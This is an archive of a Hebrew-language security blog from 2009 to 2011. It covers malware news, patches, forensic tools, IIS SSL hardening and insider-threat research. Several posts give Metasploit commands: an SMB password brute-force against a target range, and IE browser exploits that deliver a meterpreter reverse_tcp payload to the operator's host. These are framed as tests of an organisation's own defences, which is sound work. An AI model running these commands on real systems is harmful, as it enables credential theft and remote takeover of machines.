Sec-See

links to malware sites for testing your geers

2011-12-30T21:05:00.000+02:00

אתר מעולה המציג אוסף לינקים לאתרים נגועים בכל רושעה שנחפוץ - מעולה לבדיקת תוכנות AV PROXY IPS וכל שימוש נוסף שאפשר לחשוב עליו .
האתר מעודכן ע"י הקהילה ואינו מסחרי
לשימושכם.
http://www.malwaredomainlist.com/mdl.php

מודול בדיקת סיסמאות בדומיין (smb)

2011-07-08T06:18:00.001+03:00

לצורך בדיקת סיסמאות בדומיין (כניסה לתחנות- SMB) ,אני משתמש במודול חזק של :metasploit

הפעלה:

$ msfconsole

msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(smb_login); run

Module Options

BLANK_PASSWORDS	Try blank passwords for all users (default: true)
BRUTEFORCE_SPEED	How fast to bruteforce, from 0 to 5 (default: 5)
PASS_FILE	File containing passwords, one per line
PRESERVE_DOMAINS	Respect a username that contains a domain name. (default: true)
RHOSTS	The target address range or CIDR identifier
RPORT	Set the SMB service port (default: 445)
SMBDomain	SMB Domain (default: WORKGROUP)
SMBPass	SMB Password
SMBUser	SMB Username
STOP_ON_SUCCESS	Stop guessing when a credential works for a host
THREADS	The number of concurrent threads (default: 1)
USERPASS_FILE	File containing users and passwords separated by space, one pair per line
USER_AS_PASS	Try the username as the password for all users (default: true)
USER_FILE	File containing usernames, one per line
VERBOSE	Whether to print output for all attempts (default: true)
CHOST	The local client address
CPORT	The local client port
ConnectTimeout	Maximum number of seconds to establish a TCP connection
DCERPC::ReadTimeout	The number of seconds to wait for DCERPC responses
MaxGuessesPerService	Maximum number of credentials to try per service instance. If set to zero or a non-number, this option will not be used.
MaxGuessesPerUser	Maximum guesses for a particular username for the service instance. Note that users are considered unique among different services, so a user at 10.1.1.1:22 is different from one at 10.2.2.2:22, and both will be tried up to the MaxGuessesPerUser limit. If set to zero or a non-number, this option will not be used.
MaxMinutesPerService	Maximum time in minutes to bruteforce the service instance. If set to zero or a non-number, this option will not be used.
NTLM::SendLM	Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM	Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN	Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required
NTLM::UseLMKey	Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session	Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2	Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies	Use a proxy chain
REMOVE_PASS_FILE	Automatically delete the PASS_FILE on module completion
REMOVE_USERPASS_FILE	Automatically delete the USERPASS_FILE on module completion
REMOVE_USER_FILE	Automatically delete the USER_FILE on module completion
SMB::ChunkSize	The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM	The Native LM to send during authentication
SMB::Native_OS	The Native OS to send during authentication
SMB::VerifySignature	Enforces client-side verification of server response signatures
SMBDirect	The target port is a raw SMB service (not NetBIOS)
SMBName	The NetBIOS hostname (required for port 139 connections)
SSL	Negotiate SSL for outgoing connections
SSLVersion	Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
ShowProgress	Display progress messages during a scan
ShowProgressPercent	The interval in percent that progress should be shown
WORKSPACE	Specify the workspace for this module
DCERPC::fake_bind_multi	Use multi-context bind calls
DCERPC::fake_bind_multi_append	Set the number of UUIDs to append the target
DCERPC::fake_bind_multi_prepend	Set the number of UUIDs to prepend before the target
DCERPC::max_frag_size	Set the DCERPC packet fragmentation size
DCERPC::smb_pipeio	Use a different delivery method for accessing named pipes (accepted: rw, trans)
SMB::obscure_trans_pipe_level	Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level	Place extra padding between headers and data (level 0-3)
SMB::pad_file_level	Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion	Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size	Maximum buffer size for pipe reads
SMB::pipe_read_min_size	Minimum buffer size for pipe reads
SMB::pipe_write_max_size	Maximum buffer size for pipe writes
SMB::pipe_write_min_size	Minimum buffer size for pipe writes
TCP::max_send_size	Maxiumum tcp segment size. (0 = disable)
TCP::send_delay	Delays inserted before every send. (0 = disable)

GEO IP - שימוש ב PERL לזיהוי מקורות שמות אתרים וכתובות IP

2010-07-31T18:49:00.001+03:00

לא אחת אני נזקק לזיהוי מקור עולמי של כתובות IP המתקיפות את הארגון או זיהוי מידע הנשלח מהארגון .
נכון להיום אין לי כלי מסחרי היודע לנתח את נתוני ה FW ,PROXY וכו ולהראות מיפוי עולמי של גישות אלו.

קיימות מספר חבילות PERL שדרכם ניתן לפרסר כתובות IP ושמות DOMAIN ולזהות את ארץ המקור
אני אתמקד בחבילה: Geo::IPfree
את החבילה ניתן להוריד בקלות דרך ה PACKEGE MANAGER של ה ACTIVE PERL ,החבילה כוללת מספר יכולות אשר ניתן ללמוד עליהם כאן:
http://search.cpan.org/~bricas/Geo-IPfree-1.101650/lib/Geo/IPfree.pm
בנוסף החבילה מגיעה עם קובץ DAT המהווה למעשה את ה DB המקומי של הרשתות בעולם .
את הקובץ רצוי לשדרגאחת לשבוע עד חודש כאן:
http://software77.net/geo-ip/?DL=4&x=Download
יש למקם אותו בספרית ה PERL במקום הקובץ המקורי המגיע עם החבילה:

סקריפט לדוגמא הקורא מקובץ CSV את העמודה הראשונה - בודק אותה מול ה GEOIP ומחזיר קובץ CSV חדש בתוספת העמודה הגאוגרפית:

ניתן לשנות ולשהתמש בחלקים בהערה במקום הקיים

להורדת הסקריפט:
https://docs.google.com/leaf?id=0B2RudizokeYDMzhjMjQ4NTQtM2RlMi00YzBlLTkwMGUtNGVmYWY4NWE1YThh&sort=name&layout=list&num=50

Stuxnet - וירוס חדש +ZERO DAY חדש

2010-07-31T07:14:00.000+03:00

רימה חדשה נחתה ביולי 2010 .בכינויים:stuxnetStuxnet (McAfee) , RTKT_STUXNET.A (Trend Micro) , Win32/Stuxnet.A (CA) .

שני דברים מעניינים בתולעת הזאת ושעבורם הגוף שהזמין את התולעת שילם ה ר ב ה כסף להאקר:

התולעת מתקינה שני דרייברים (עבור הROOTKIT) הנראים חתומים בחיתום חוקי של חברת Realtek ,מעניין איך זה קרה...
שימוש ב ZERODAY חדש הפועל על כל סוגי מערכות ההפעלה חלונות :CVE-2010-2568 המנצל פגיעות בקיצור דרך ,קבצי .LNK.

התולעת מתרבה דרך התקני USB ושיתופים ברשת וזאת ללא שימוש במנגנון ה AUTORUN הידוע לשימצה ונחסם ברוב הארגונים.

לבדיקת ה ZERODAY מול מערכות ההגנה הארגוניות :

http://www.metasploit.com/modules/exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute

מידע נוסף:

http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx

http://www.digitalwhisper.co.il/0x27/

התקפה טורקית על אתרים ישראליים באמצעות DNS cache poisoning

2010-06-12T00:58:00.000+03:00

ביום חמישי ה 10.6.2010 התבצעה התקפת DNS cache poisoning על מספר אתרים ישראליים ע"י קבוצת ההאקרים הטורקית TurkGuvenligi Tayfa .החברות מיהרו לעדכן ולתקן את הרשומות ב DNS אך עבור משתמשים רבים מאחורי אמצעי CACHEING ארגוניים ( ISA ודומיו) התופעה נמשכה לאורך כל אותו היום.

הדף שהופנו אליו המשתמשים ממוקם בשיקגו.

FYI

windows update ISO DVD

2010-05-24T17:23:00.000+03:00

מיקרוסופט מאפשרת הורדה של דיסקים(ISO) המכילים את עדכוני האבטחה החודשיים .
זאת אופציה טובה עבור איזורים מאובטחים ומנותקים ברשת המצריכים גישה פיזית בלבד להרצת עדכונים וכן עבור ארגונים המיישמים מספר שפות בסניפים ברחבי העולם ולא משתמש באפליקציות כגון WSUS
הדיסקים מכילים את כל השפות וכל מערכות ההפעלה כולל בx64
לקריאה נוספת:

http://support.microsoft.com/kb/913086

Regex Creator - הדרך הקלה לתשלום האגרה

2010-05-20T23:37:00.002+03:00

מי לא נתקל בצורך להשתמש ב REGEX בתוך הסקריפטים שלו ,למצוא את ה regex המדוייק הוא נושא כאוב אך מחויב המציאות.
הכלי החינמי הזה הוא הפתרון המושלם לבעיה ,באמצעותו ניתן לגזור את הביטוי הרגולרי מתוך הטקסט ולבצע בדיקות התאמה , בנוסף ניתן לבנות חיתוך לקבוצות אשר יוצבו כערכים למשתנים בסקריפט.

הכלי מבוסס JAVA וניתן להרצה על כל פלטפורמה התומכת ב JAVA .
כמו שרואים בצילום המסך , מדביקים את ה טקסט במסך העליון ,לאחר מכן ניתן לסמן חלקים כקבועים (delimiters) או כמשתנים- (group) , לאחר שממפים את כל הטקסט ,לוחצים עלgenerate regex
ומעתיקים לסקריפט.
מומלץ בחום .

Microsoft Security Bulletin MS10-018 - Critical - התשובה ל CVE-2010-0806

2010-04-03T13:08:00.000+03:00

להורדה:
http://www.microsoft.com/technet/security/bulletin/ms10-018.mspx

yet another zero day for microsoft iexplorer-CVE-2010-0806

2010-03-24T11:42:00.003+02:00

שוב -בידקו את מערכות ההגנה שלכם :

Pירצה חדשה בIEXPLORER התגלת ע"י ישראלי בשם משה בן אבו ( כבוד!)
CVE-2010-0806
http://www.securitytube.net/Internet-Explorer-Iepeers-Pointer-Exploit-Metasploit-Demo-video.aspx

Microsoft Security Advisory 981374

Vulnerability in Internet Explorer Could Allow Remote Code Execution

Published: March 09, 2010
Updated: March 12, 2010

msf > use exploit/windows/browser/ie_iepeers_pointer

msf exploit(ie_iepeers_pointer) > show payloads

msf exploit(ie_iepeers_pointer) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ie_iepeers_pointer) > set LHOST [MY IP ADDRESS]

msf exploit(ie_iepeers_pointer) > exploit

בדיקת virtual patch's - או כיצד מערכות האבטחה שלנו מתמודדות עם ZERO DAY

2010-03-08T08:21:00.001+02:00

virtual patch's או זיהוי וחסימת התקפה לפני שיחרור הטלאי הרשמי ל ZERODAY הם הגנה מעולה בזמן הפגיע ביותר למחשבים , כלומר הזמן בו המתקיפים יכולים להשתמש בפגיעות וזיכויי ההצלחה הם קרוב ל 100%.
אך האם הפרסומים שיוצאים איתם חברות אבטחה המידע נכונים?
ארגונים מעטים מסמלצים התקפות ובודקים את ההגנות לZERODAY ב א מ ת .
אני ממליץ לכל אנשי האבטחה להתקין BACKTRACK ולהשתמש ב METASPLOIT או כלים אחרים לביצוע התקפה אמיתית תוך כדי שימוש בקוד הזמין באינטרנט לבדיקת מערכות האבטחה שלהם.
אין כאן צורך ב PENTEST מעמיק וזאת צריכה להיות עבודה שהיא חלק מהשוטף .חלק נכבד מההתקפות ניתן לסמלץ בשעה עבודה.
אני אישית כבר עליתי על אבטחת שווא כזאת מחברה שלא אזכיר את שמה ובעקבות זה שונתה החתימה .

לדוגמא
ה Z0RO DAY האחרון מבית מיקרוסופט המאפשר הרצת קוד על המותקף ע"י פיתויו ללחוץ f1 דרך הודעה הכתובה ב
VB

Microsoft Security Advisory 981169

Vulnerability in VBScript Could Allow Remote Code Execution

Published: March 01, 2010

במקום לשבת ולחקות ל PATCH -נבדוק האם קוד הEXPLOIT זמין וננסה לבדוק את חסינות מערכות האבטחה שלנו מולו
החל מהגנות בגלישה , IPS,MAIL ועד לרמת ה AV המקומי.

הקוד זמין לבדיקה ב METASPLOIT
לאחר כל ההגדרות והעדכונים נעלה אתר ברשת המבצע את ה EXPLOIT ע"י הרצץ הפקודות הבאות

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/browser/ie_winhlp32
msf exploit(ie_winhlp32) > show payloads
msf exploit(ie_winhlp32) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_winhlp32) > set LHOST [MY IP ADDRESS]
msf exploit(ie_winhlp32) > exploit

אופציות המודול:

SRVHOST The local host to listen on. (default: 0.0.0.0)

SRVPORT The local port to listen on. (default: 8080)

SSL Negotiate SSL for incoming connections

SSLVersion Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3)

URIPATH The URI to use for this exploit (default is random)

ContextInformationFile The information file that contains context information

DisablePayloadHandler Disable the handler code for the selected payload

EnableContextEncoding Use transient context when encoding payloads

WORKSPACE Specify the workspace for this module

HTML::base64 Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection)

HTML::javascript::escape Enable HTML obfuscation via HTML escaping (number of iterations)

HTML::unicode Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)

HTTP::chunked Enable chunking of HTTP responses via "Transfer-Encoding: chunked"

HTTP::compression Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate)

HTTP::header_folding Enable folding of HTTP headers

HTTP::junk_headers Enable insertion of random junk HTTP headers

TCP::max_send_size Maximum tcp segment size. (0 = disable)

TCP::send_delay Delays inserted before every send. (0 = disable)

בהצלחה

מה עשרות אלפי משתמשי חלונות ברחבי העולם עשו השבוע?

2010-03-05T21:07:00.001+02:00

עשרות אלפי משתמשים בעולם כיוונו את המסך הבא כך:

הסיבה?
מיקרוסופט שיחררה עדכון דרך מנגנון windows update אשר כל תפקידו הוא למגר את תופעת העותקים הגנובים של מערכת ההפעלה windows 7 .

KB971033 -יורד ומותקן אוטומאטית במחשב ומזהה קרוב ל 70 סוגים שונים של קראקים וסיראלס לא חוקיים.בנוסף,העדכון מכיל מנגנון CALL HOME הפונה למיקרוסופט כל 90 יום ומוריד עדכונים ל WAT (windows activastion technology ) לזיהוי קראקים נוספים שיצוצו .מחשב שזוהה כלא חוקי יקבל מסכים מציקים ושאר הפתעות במיטב המסורת.

עכשיו ,בתור איש אבטחת מידע ,אני בדילמה...
מצד אחד ברור שפעילות מיקרוסופט היא לגיטימית ונועדה למקסם רווחים ולשמור על זכויות היוצרים (נניח רגע בצד את המחירים השערוריתיים והמונופוליזם הזוועתי).מצד שני ,מעתה ואילך ,אותם עשרות אלפי מערכות לא חוקיות לכאורה או שלא לכאורה (מה עם קורבנות אמיתיים?) לא יזכו לראות עדכוני אבטחה בחייהם!
ושלא יהיו טעויות - הקראק לפתרון החסימה בדרך, זה רק עניין של זמן עד שכל אותם מחשבים יחזרו למצבם ה"חוקי" אך האם המשתמשים יאשרו מחדש פתיחה של העדכונים האוטומטיים? זה לא יקרה .המחשבים האלו דינם להידבק ולהדביק ובסופו של דבר גם מחזיקי העותקים החוקיים יפגעו בתהליך.

מננגנון העדכונים של מקרוסופט הופך שוב את עורו ממשהו בעל חשיבות למשהו שנוא שעדיף להשתיקו.

כל זה מוביל אותי לשתי מסקנות:

1. הבעיה היא כמו תמיד ביישום ולא במנגנון ההצפנה :) כלומר ,מיקרוסופט יכולה למצא דרך תקשורת חלופית לזיהוי עותקים לא חוקיים ללא שימוש במנגנון העדכונים ובכך גם לטפל בסוררים וגם לשמור על מערכת הפעלה מעודכנת ומאובטחת.
2. עוד עבודה בשבילי!

שבת שלום.

מתקפת PHISHING במסגרת אהבתנו ל FACEBOOK

2010-03-01T22:52:00.002+02:00

עשרות מיילים נשלחו לארגון בו אני עובד בזו הלשון:

במבט מהיר על סגנון הטקסט ניתן לקבוע כי אנגלית איננה שפת האם של השולחים:)

בבדיקת הקובץ התקבלו התוצאות:

הקובץ מזוהה ע"י רוב חברות הAV כDROPPER - החלק הראשון של הטרויאני כלומר הקובץ ה"מכין את השטח" וממתין לביצוע הורדה של חלקים נוספים של הוירוס למטרון שונות

ראו הוזהרתם

Tidserv and MS10-015 -מסכים כחולים-רע לעסקים

2010-02-27T09:00:00.000+02:00

עדכוני windows לחודש פברואר 2010 כללו בין השאר עדכון לקרנל המונע העלאת הרשאות -privlages elevation
העדכון עורר סערה בקרב אנשי הסיסטם ואבטחת המידע בטענה כי כתוצאה מהתקנתו המחשב קורס ומתקבל מסך כחול (blue screen of death).

תופעה זו נדירה ביותר ויאמר לזכותה של מיקרוסופט שתהליכי הבדיקות שלה נעשים בצורה מדוקדקת וטובה.

התופעה הקפיצה את אנשי אבטחת המידע לחקור לעומק את העניין והמסקנה לא אחרה לבוא:
מחשבים שהכילו את הוירוס :Backdoor.Tidserv אשר אחד ממאפיניו הוא שימוש ב ROOTKIT המשנה קבצי מערכת שונים על מנת להסוות את פעילות הוירוס , הם הם היחידים שקיבלו את המסך הכחול הארור.

הקבצים ששונו ע"י טלאי האבטחה הם:

:atapi.sys

iastor.sys

idechndr.sys

ndis.sys

nvata.sys

vmscsi.sys

בגדול -כאשר הוירוס פונה אל הAPI של חלקים אלו במערכת ההפעלה לאחר השינוי שלהם ע"י ה PATCH - הוא מקבל תשובה שגוייה ונכנס למצב ERROR שבו המחשב קורס.

פרטים נוספים

נכון להיום "יוצרי" הוירוס כתבו אותו מחדש כך שיתאים לשינוי שמיקרוסופט ביצעה כי אחרי הכול מסכים כחולים רעים לעסקים גם של מפעילי הוירוס :)

לאחר הגילוי - הפצנו את הטלאי בארגוננו - ממליץ לכל שאר הארגונים לבצע זאת.

מאמר שלי התפרסם היום בירחון אבטחת המידע digitalwhisper

2010-02-01T22:57:00.000+02:00

לצפיה והורדה:
http://www.digitalwhisper.co.il/0x0D/

מומלץ

כלי command חינמי לביצוע עידכוני windows update

2009-12-20T18:59:00.006+02:00

בשיטוטים האחרונים ברשת נתקלתי בכלי מעולה הנקרא- WuInstall1_1 מחברת xeox

הכלי כתוב ב C++ ומאפשר שימוש ב windows updateAPI לבדיקת עדכונים להם התחנה זקוקה

האפשרויות הם רבות וכוללות :

חיפוש בלבד

התקנה

התקנה+REBOOT

בנוסף קיימות אפשריויות לחיפוש עדכון מסויים או לפי סוג העדכון (SOFTWARE,DRIVERS וכדומה).

הכלי פונה לפי ההגדרות בתחנה ל WSUS או לשרתי WINDOWS UPDATE בהתאמה.

הגרסה בתשלום כוללת פיצ'רים נוספים

מעייו apt-get קטן לעידכוני חלונות.

ממליץ בחום לשילוב בסקיפטים .

להוריד מכאן

OWASP 2010 TOP 10

2009-11-28T21:57:00.005+02:00

לצפיה -

The new OWASP Top Ten can be seen below:

A1 – Injection

A2 – Cross Site Scripting XSS
A3 – Broken Authentication and Session Management
A4 – Insecure Direct Object References
A5 – Cross Site Request Forgery (CSRF
A6 – Security Misconfiguration(NEW
A7 – Failure to Restrict URL Access
A8 – Unvalidated Redirects and Forwards (NEW
A9 – Insecure Cryptographic Storage
A10 – Insufficient Transport Layer Protection

METASPLOIT 3.3 RELEASED!

2009-11-20T20:28:00.001+02:00

להורדה:

http://www.metasploit.com/

UserAssist - כלי נוסף וטוב ל FORENSIC WINDOWS

2009-11-20T19:58:00.006+02:00

UserAssist

explorer שומר את רשימת התוכנות שהורצו על המחשב ב KEY - UserAssist ב REGISTRY

התוכנה יודעת לפענח את הנתונים ולהציגם בטבלה לפי סדר ההרצה או כל סדר אחר שנרצה.

לא פעם אחת נישאלתי במהלך עבודתי שאלה כמו :" האם אתה יכול להגיד לי מה העובד עשה על המחשב בתאריך X ?" - התוכנה הזאת היא עוד כלי עזר חשוב לנסיון מענה על שאלה כזאת .

להורדה:

http://blog.didierstevens.com/programs/userassist/

* התוכנה מחייבת dot net 2

* התוכנה מאפשרת קריאת קובץ REG מיובא ממחשב אחר.(COOL!)

האיום הפנימי - הגדרה ודרכים להתמודדות

2009-10-31T19:37:00.007+02:00

הגדרה : עובד מועסק או מועסק לשעבר , שותף עסקי נוכחי או לשעבר שיש או שהיה לו גישה למערכות המידע של החברה ,וביצע בכוונת זדון שימוש לרעה,שיבוש,מחיקה וכו במידע .

ההגדרה הורחבה לאחרונה גם לשותפים עסקיים,ספקים וכו בשל הנטייה ההולכת וגוברת של הוצאת תהליכים ותמיכה במערכות המידע למיקור חוץ ( outsourcing ) , החל בחיבורים לצורך תמיכה במערכות מרכזיות כגוןWEB ,DATABASES,STORAGE וכלה בהוצאת קמפיינים , DATA MINING ומשימות אחרות לחברות צד שלישי וספקים.

ארגון CERT האמריאי ערך מחקר מקיף החל מ 1996 ועד היום וניתח קרוב ל 300 מקרים של התקפות ע"י גורמים המוגדרים פנימיים.

להלן חלק מהמסקנות שהגיעו אליהם:

ניתן לחלק את ההתקפות לשלוש קטגוריות מרכזיות:

חבלה - במקרים אלו התוקף מעוניין לגרום נזק לארגון או לאדם בארגון, מחיקת מידע , הורדת מערכות ,והפרעה לאופרציה הנורמלית בארגון - מתוך 300 - כ 100 מוגדרות כנסיון חבלה.
גנבת קניין רוחני- במקרים אלו התוקף גונב סודות חברה,תוכניות חברה,קוד פיתוח,תוכניות אסטרטגיות וכו . כ 40 מתוך ה 300 מוגדרים כגנבת קניין רוחני.
גניבה או טיפול במידע לצורך רווח כספי - בקטגורה זו נכללים גניבת או שינוי פרטים אישיים , כרטיסי אשראי וכו לצורך מכירה של המידע בשלב מאוחר יותר , ברוב המקרים התוקף הפנימי מקבל תשלום ע"י גורם חיצוני לביצוע העברה. כ 106 מקרים הם מסוג זה .
MISC - כ 46 מקרים בהן אין מספיק ראיות או מידע לשייך את ההתקפה לאחת מהקטגוריות.

כמובן שחלק מהמקרים מתפרסים על כמה קטגוריות ביחד.

50% מעובדים שביצעו עבירות מסוג זה החזיק במשרה טכנית בארגון.

נקודות חשובות באבטחת מידע שעלו מהמקרים .

ברמת ניהול הסיכונים - יש להרחיב את מעגל האבטחה שיכלול את כל קבלני המשנה,נותני התמיכה,וספקים חיצוניים בעלי גישה למידע אירגוני - הקשחת והגבלת הגישה למשאבים ע"י גורמים אילו,ניטור ומעקב ככל הניתן לפעולות הנעשות ע"י הגורמים החיצוניים בתוך הארגון וכן ניתוק מידי של הקבלן בתום העסקתו עשויים למנוע התקפות דרך גורמים אלו
need to know bases - ניתוח המקרים מעלה שברוב המקרים התוקף קיבל הרשאות גישה גבוהות בהרבה ממה שהיה צריך לעבודתו , באחד מהמקרים מצויין כי איש מכירות הצליח לגנוב קוד מקור של מוצר וזאת מכיוון שהיתה לו הרשאה לספריה שהיכילה קוד זה .הגבלת ההרשאות לצרכי עבודה היתה מונעת מקרה זה.
הפרדת רשויות - פיצול פעולות קריטיות לגורם מאשר וגורם מבצע - בחקירת המקרים התגלה כי למרות שהפרדה זו קיימת ,במקרים רבים אין אכיפה באמצעים טכניים וגם אם קיימת , היא לא מבוצעת נכון. ברוב במקרים הפרדות אלו קיימות בעיקר "על הנייר".
הפרדת ופיצול הרשאות בתוך קבוצת ה system administrators - מחקירת המקרים עלה שלא כל מנהלי הרשת צריכם גישה לניהול כל הרשת :) יש לנסות להפריד הרשאות גם בתוך הקבוצה הזאת דוגמא למיקרה שהובא היתה ,מנהל רשת זוטר שעמד לפני פיטורים אך עדיין היה בעל הרשאות ADMIN גורפות בארגון - דבר שאפשר לו לחבל בשרתים רבים וכן למחוק את הלוגים על פעילות זו ואף לכונונם שיצביעו על המנהל שלו כגורם האשם.
ניהול חשבונות והרשאות - המחקר מעלה שרוב פעולות החבלה התבצעו לאחר הפיטורין אך בעזרת התחברות לרשת שהוכנה מראש ע"י העובד . בדרך כלל השימוש היה בחשבונות משותפים (משתמש אפליקטיבי)test,traning,sysadmin,dba וכו ,חשבונות שקשה מאד לזהות מי בעצם המשתמש האמיתי ה"מסתתר " מאחוריהם. במיקרים רבים מנהלי רשת יצרו חשבונות שנראו לצרכים לגיטימיים אך למעשה שימשו אותם להתחברות מרחוק לארגון לאחר הפיטורין.
סיסמאות - מקרים רבים הראו כי משתמשים העבירו בינהם ססמאות בכדי לחסוך זמן ולבטל את הצורך בגורם אחד מאשר ואחד מבצע .
סיסמאות חלשות - במקרים רבים מנהלי רשת וגורמים אחרים הריצו PASSWORD CRACKERS ופרצו לחשבונות ולקבצים מוגני סיסמה לצורך גניבת הרשומות.חלק מהחשבונות שנפרצו שימשו להם לאחר הפיטורים דרך להתחבר לארגון.
auditing and log mamagment - במקרים רבים נראו גישה לשרתים רגישים והורדת downloads כמות גדולה של קבצים ,פרט מעניין נוסף הוא שרוב הפעולות מסוג זה נעשו בחלון זמן של 3-1 חודשים לפני פיטורי עובד או התפטרות - בדיקה של תבניות כאלו יכולות לעזור בגילוי מקרים של פעולה פנימית.
חשיבות שיתוף פעולה בין מחלקות כוח אדם , IT ,מנהלים, והבעלים של המידע - חקירת המקרים מעלה שלא די באמצעי IT ( טכניים) בלבד לזיהוי פשע ההולך להיתבצע אלא חייב שיתוף פעולה עם מחלקות כוח אדם ובעלי המידע עצמו היודעים למי הצורך במידע ולמי לא בהתאמה לגורמים כגון פיטורים, מירמור בעבודה וכו.

FYI

הקשחות SSL בשרתי IIS

2009-10-20T22:56:00.008+02:00

תקן PCI ותקנים נוספים מחייבים הקשחת מנגנון ה SSL HTTPS .

התקן מחייב - ביטול תמיכה לאחור ב ssl v 2 והקשחת אלגוריתם ההצפנה .

ההקשחה מתבצעת ב REGISTRY של שרת ה IIS וניתנת לבדיקת ע"י כלי של FOUND STONE = SSLDIGGER

http://stdout-dev-null.blogspot.com/2006/02/disable-ssl2-and-weak-ciphers-in-iis.html

השינויים:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\Multi-Protocol Unified Hello\Server]

"Enabled"=dword:ffffffff[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT 1.0\Server]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0\Server]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0\Server]

"Enabled"=dword:ffffffff[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0\Server]

"Enabled"=dword:ffffffff

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\DES 56/56]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\NULL]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 128/128]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 40/128]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC2 56/128]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 128/128]

"Enabled"=dword:ffffffff[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 40/128]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 56/128]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\RC4 64/128]

"Enabled"=dword:00000000[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\Triple DES 168/168]

"Enabled"=dword:ffffffff

Security Event log logon/off תיזכורת

2009-09-23T07:21:00.003+03:00

מדי פעם , אני נקרא לדגל בכדי לפענח פעילת תחנה או משתמש ברשת .
כחלק מהבדיקות הרבות שאני מבצע , אני מתיחחס גם לEVENT LOGS בתחנה וב DC לגבי אירועי LOGON\OFF
אך מתקשה לזכור את ה EVENT ID הרלוונטיים.
אז הנה רשימה קצרה לתזכורת (xp 2000):
לרשימה המלאה:
http://www.ultimatewindowssecurity.com/securitylog/encyclopedia/Default.aspx

528 - Successful Logon

529 - Logon Failure - Unknown user name or bad password

530 - Logon Failure - Account logon time restriction violation

531 - Logon Failure - Account currently disabled

533 - Logon Failure - User not allowed to logon at this computer
534 - Logon Failure - The user has not been granted the requested logon type at this machine

535 - Logon Failure - The specified account's password has expired

536 - Logon Failure - The NetLogon component is not active

537 - Logon failure - The logon attempt failed for other reasons

538 - User Logoff

539 - Logon Failure - Account locked out

551 - User initiated logoff

552 - Logon attempt using explicit credentials

682 - Session reconnected to winstation

683 - Session disconnected from winstation

ZER0 DAY SMB V2

2009-09-23T06:22:00.005+03:00

FYI
פירצת אבטחת התגלת בפרוטוקול SMB V2 שפותח ע"י מיקרוסופט ומיושם ב VISTA ו SERVER 2008

לפי שעה אין PATCH המתקן את חור האבטחה .
מיקרוסופט מציעה לבטל את השימוש בפרוטוקול זה ואף מספקת כלי ( FIXIT) המבצע זאת אוטומטית .
ניתן לוהוריד את הכלי כאן:
http://blogs.technet.com/srd/archive/2009/09/18/update-on-the-smb-vulnerability.aspx

cve id:
CVE-2009-3103

FYI

FLASH SECRETS - כלים לבדיקת ACTION SCRIPTS

2009-09-13T07:21:00.008+03:00

